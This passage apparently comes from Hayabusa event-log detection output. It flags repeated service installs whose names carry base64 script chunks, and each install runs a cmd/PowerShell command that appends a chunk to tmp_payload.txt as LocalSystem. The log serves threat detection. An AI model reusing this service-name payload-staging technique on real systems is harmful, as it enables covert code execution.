2021-11-03 17:18:53.026 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: biBMb2cgU2l6ZSAoTUIpIiA9ICRib3guVmFsdWUuQXBwbGljYXRpb25FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiU2VjdXJpdHkgKEVQUykiID0gJGJveC5WYWx1ZS5TZWN1cml0eUVQUzsgIl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:53.026 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: biBMb2cgU2l6ZSAoTUIpIiA9ICRib3guVmFsdWUuQXBwbGljYXRpb25FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiU2VjdXJpdHkgKEVQUykiID0gJGJveC5WYWx1ZS5TZWN1cml0eUVQUzsgIl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:53.026 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: biBMb2cgU2l6ZSAoTUIpIiA9ICRib3guVmFsdWUuQXBwbGljYXRpb25FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiU2VjdXJpdHkgKEVQUykiID0gJGJveC5WYWx1ZS5TZWN1cml0eUVQUzsgIl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:54.457 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: NlY3VyaXR5IDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlNlY3VyaXR5Rmlyc3RFdmVudFRpbWU7ICJTZWN1cml0eSBsYXN0IEV2ZW50IiA9ICRib3guVmFsdWUuU2VjdXJpdHlMYXN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:54.457 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: NlY3VyaXR5IDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlNlY3VyaXR5Rmlyc3RFdmVudFRpbWU7ICJTZWN1cml0eSBsYXN0IEV2ZW50IiA9ICRib3guVmFsdWUuU2VjdXJpdHlMYXN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:54.457 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: NlY3VyaXR5IDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlNlY3VyaXR5Rmlyc3RFdmVudFRpbWU7ICJTZWN1cml0eSBsYXN0IEV2ZW50IiA9ICRib3guVmFsdWUuU2VjdXJpdHlMYXN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:55.903 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: OyAiU2VjdXJpdHkgdG90YWwgZXZlbnRzIiA9ICRib3guVmFsdWUuU2VjdXJpdHlUb3RhbEV2ZW50czsgIlNlY3VyaXR5IExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TZWN1cml0eUV2ZW50TG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:55.903 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: OyAiU2VjdXJpdHkgdG90YWwgZXZlbnRzIiA9ICRib3guVmFsdWUuU2VjdXJpdHlUb3RhbEV2ZW50czsgIlNlY3VyaXR5IExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TZWN1cml0eUV2ZW50TG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:55.903 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: OyAiU2VjdXJpdHkgdG90YWwgZXZlbnRzIiA9ICRib3guVmFsdWUuU2VjdXJpdHlUb3RhbEV2ZW50czsgIlNlY3VyaXR5IExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TZWN1cml0eUV2ZW50TG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:57.355 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9nU2l6ZTsgDQogICAgICAgICAgICAiU3lzdGVtIChFUFMpIiA9ICRib3guVmFsdWUuU3lzdGVtRVBTOyAiU3lzdGVtIDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlN5c3RlbUZpcnN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:57.355 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 9nU2l6ZTsgDQogICAgICAgICAgICAiU3lzdGVtIChFUFMpIiA9ICRib3guVmFsdWUuU3lzdGVtRVBTOyAiU3lzdGVtIDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlN5c3RlbUZpcnN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:57.355 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9nU2l6ZTsgDQogICAgICAgICAgICAiU3lzdGVtIChFUFMpIiA9ICRib3guVmFsdWUuU3lzdGVtRVBTOyAiU3lzdGVtIDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlN5c3RlbUZpcnN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:58.798 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: OyAiU3lzdGVtIGxhc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5TeXN0ZW1MYXN0RXZlbnRUaW1lOyAiU3lzdGVtIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLlN5c3RlbVRvdGFsRXZlbnRzOyAiU3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:58.798 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: OyAiU3lzdGVtIGxhc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5TeXN0ZW1MYXN0RXZlbnRUaW1lOyAiU3lzdGVtIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLlN5c3RlbVRvdGFsRXZlbnRzOyAiU3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:58.798 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: OyAiU3lzdGVtIGxhc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5TeXN0ZW1MYXN0RXZlbnRUaW1lOyAiU3lzdGVtIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLlN5c3RlbVRvdGFsRXZlbnRzOyAiU3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:00.236 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: lzdGVtIExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TeXN0ZW1FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiVG90YWwgKEVQUykiID0gJGJveC5WYWx1ZS5Ub3RhbEVQUzsgIlByb2ZpbGUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:00.236 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: lzdGVtIExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TeXN0ZW1FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiVG90YWwgKEVQUykiID0gJGJveC5WYWx1ZS5Ub3RhbEVQUzsgIlByb2ZpbGUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service
execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:00.236 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: lzdGVtIExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TeXN0ZW1FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiVG90YWwgKEVQUykiID0gJGJveC5WYWx1ZS5Ub3RhbEVQUzsgIlByb2ZpbGUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:01.719 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: U3VnZ2VzdGlvbiAoMyBTZWMgUG9sbGluZyBJbnRlcnZhbCkiID0gJGJveC5WYWx1ZS5Qcm9maWxlU3VnZ2VzdGlvbjt9KQ0KDQogICAgICAgIH0NCg0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5QVV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:01.719 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: U3VnZ2VzdGlvbiAoMyBTZWMgUG9sbGluZyBJbnRlcnZhbCkiID0gJGJveC5WYWx1ZS5Qcm9maWxlU3VnZ2VzdGlvbjt9KQ0KDQogICAgICAgIH0NCg0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5QVV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:01.719 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: U3VnZ2VzdGlvbiAoMyBTZWMgUG9sbGluZyBJbnRlcnZhbCkiID0gJGJveC5WYWx1ZS5Qcm9maWxlU3VnZ2VzdGlvbjt9KQ0KDQogICAgICAgIH0NCg0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5QVV | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:03.160 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RfTE9HICJTZWxlY3QgRXZlbnQgTG9nIEV4cG9ydCBMb2NhdGlvbi4uLiINCg0KICAgICAgICAkRXhwb3J0Rm9sZGVyID0gU2VsZWN0LUV4cG9ydExvY2F0aW9uICJFdmVudCBMb2cgU3VtbWFyeSBS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:03.160 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RfTE9HICJTZWxlY3QgRXZlbnQgTG9nIEV4cG9ydCBMb2NhdGlvbi4uLiINCg0KICAgICAgICAkRXhwb3J0Rm9sZGVyID0gU2VsZWN0LUV4cG9ydExvY2F0aW9uICJFdmVudCBMb2cgU3VtbWFyeSBS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: 
LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:03.160 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RfTE9HICJTZWxlY3QgRXZlbnQgTG9nIEV4cG9ydCBMb2NhdGlvbi4uLiINCg0KICAgICAgICAkRXhwb3J0Rm9sZGVyID0gU2VsZWN0LUV4cG9ydExvY2F0aW9uICJFdmVudCBMb2cgU3VtbWFyeSBS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:04.601 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZXBvcnQgRXhwb3J0IExvY2F0aW9uIiAiRGVza3RvcCINCiAgICAgICAgDQogICAgICAgICRFeHBvcnRMb2NhdGlvbiA9ICRFeHBvcnRGb2xkZXIgKyAiXEV2ZW50LUxvZy1TdW1tYXJ5LVJlcG9ydC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:04.601 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZXBvcnQgRXhwb3J0IExvY2F0aW9uIiAiRGVza3RvcCINCiAgICAgICAgDQogICAgICAgICRFeHBvcnRMb2NhdGlvbiA9ICRFeHBvcnRGb2xkZXIgKyAiXEV2ZW50LUxvZy1TdW1tYXJ5LVJlcG9ydC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:04.601 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZXBvcnQgRXhwb3J0IExvY2F0aW9uIiAiRGVza3RvcCINCiAgICAgICAgDQogICAgICAgICRFeHBvcnRMb2NhdGlvbiA9ICRFeHBvcnRGb2xkZXIgKyAiXEV2ZW50LUxvZy1TdW1tYXJ5LVJlcG9ydC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:06.043 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0iICsgJChnZXQtZGF0ZSAtZiB5eXl5TU1kZGhobW1zcykgKyAiLmNzdiIgICAgICAgICAgICANCiAgICAgICAgICAgICAgICANCiAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiRXhwb3J0aW5n | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:06.043 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0iICsgJChnZXQtZGF0ZSAtZiB5eXl5TU1kZGhobW1zcykgKyAiLmNzdiIgICAgICAgICAgICANCiAgICAgICAgICAgICAgICANCiAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiRXhwb3J0aW5n | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg160"" | select -Expand 
DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:06.043 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0iICsgJChnZXQtZGF0ZSAtZiB5eXl5TU1kZGhobW1zcykgKyAiLmNzdiIgICAgICAgICAgICANCiAgICAgICAgICAgICAgICANCiAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiRXhwb3J0aW5n | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:07.496 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IExvZyBFdmVudHMgdG86ICRFeHBvcnRMb2NhdGlvbiINCg0KICAgICAgICAkT3V0cHV0VGFibGUgfCBFeHBvcnQtQ1NWICRFeHBvcnRMb2NhdGlvbiAtTm9UeXBlSW5mb3JtYXRpb24gLUZvcmNlDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:07.496 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IExvZyBFdmVudHMgdG86ICRFeHBvcnRMb2NhdGlvbiINCg0KICAgICAgICAkT3V0cHV0VGFibGUgfCBFeHBvcnQtQ1NWICRFeHBvcnRMb2NhdGlvbiAtTm9UeXBlSW5mb3JtYXRpb24gLUZvcmNlDQ | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:07.496 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IExvZyBFdmVudHMgdG86ICRFeHBvcnRMb2NhdGlvbiINCg0KICAgICAgICAkT3V0cHV0VGFibGUgfCBFeHBvcnQtQ1NWICRFeHBvcnRMb2NhdGlvbiAtTm9UeXBlSW5mb3JtYXRpb24gLUZvcmNlDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:08.937 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gRXhwb3J0IExvZyBSZXBvcnQiDQoNCiAgICAgICAgV3JpdGUtTG9nICRF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:08.937 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gRXhwb3J0IExvZyBSZXBvcnQiDQoNCiAgICAgICAgV3JpdGUtTG9nICRF | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:08.937 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gRXhwb3J0IExvZyBSZXBvcnQiDQoNCiAgICAgICAgV3JpdGUtTG9nICRF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:10.406 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: UlJPUl9MT0cgJEVycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 